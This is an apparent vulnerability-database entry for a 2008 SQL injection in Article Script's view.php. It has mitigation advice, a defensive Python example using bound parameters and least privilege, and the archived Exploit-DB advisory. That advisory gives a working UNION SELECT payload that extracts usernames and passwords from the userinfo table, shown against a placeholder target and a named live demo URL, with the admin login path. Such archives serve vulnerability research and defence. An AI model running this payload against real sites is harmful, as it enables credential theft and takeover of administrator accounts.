vendor: Article Script
by: Hussin X
CVSS: 8.8 HIGH
Remote SQL Injection
CWE: 89
Product Name: Article Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Article Script (view.php v ) Remote SQL Injection Vulnerability

The view.php file of the Article Script is vulnerable to SQL injection through the 'v' parameter. An attacker can exploit this issue by supplying crafted SQL in the 'v' parameter when requesting the vulnerable page. This can allow the attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and possibly compromise the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the lowest privileges necessary to perform its function.
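The two mitigations above, sketched as an added example that is not code from Article Script or from the advisory: Python with an in-memory SQLite database stands in for the script's PHP code and database. The `articles` table, its columns, the sample rows and all function names are assumptions; `v`, `userinfo`, `UserName` and `Password` come from the advisory.

```python
import sqlite3

def make_db():
    """Build a constructed sample database (all rows are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE userinfo (UserName TEXT, Password TEXT);
        INSERT INTO articles VALUES (9, 'Sample title', 'Sample body');
        INSERT INTO userinfo VALUES ('admin', 'constructed-secret');
    """)
    return conn

def restrict_to_articles(conn):
    """Least privilege: the article viewer may only SELECT from articles."""
    def authorizer(action, arg1, arg2, dbname, source):
        if action == sqlite3.SQLITE_SELECT:
            return sqlite3.SQLITE_OK
        if action == sqlite3.SQLITE_READ and arg1 == "articles":
            return sqlite3.SQLITE_OK
        return sqlite3.SQLITE_DENY  # writes, DDL and every other table
    conn.set_authorizer(authorizer)
    return conn

def parse_article_id(raw):
    """Input validation: 'v' must be a short run of ASCII digits."""
    if not isinstance(raw, str) or not raw.isascii():
        raise ValueError("v must be a positive integer")
    if not raw.isdigit() or len(raw) > 9:
        raise ValueError("v must be a positive integer")
    return int(raw)

def get_article(conn, raw_v):
    """Validate 'v', then pass it as a bound parameter, never as SQL text."""
    article_id = parse_article_id(raw_v)
    row = conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return row  # None when no article has that id

def is_denied(conn, sql):
    """Return True when the restricted connection refuses the statement."""
    try:
        conn.execute(sql)
    except sqlite3.DatabaseError:
        return True
    return False
```

The bound parameter is what keeps the value out of the SQL text; the validation and the authorizer limit what a missed code path could still reach.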

Exploit-DB raw data:

|___________________________________________________|
|
| Article Script (view.php v ) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.availscript.com/article_script.php
|
| DorK   : :)
|___________________________________________________|



Exploit:
________



www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--



L!VE DEMO:


http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--



Login :

www.[target].com/Script/admin/login.php




____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________


                             Im IRAQi

# milw0rm.com [2008-09-21]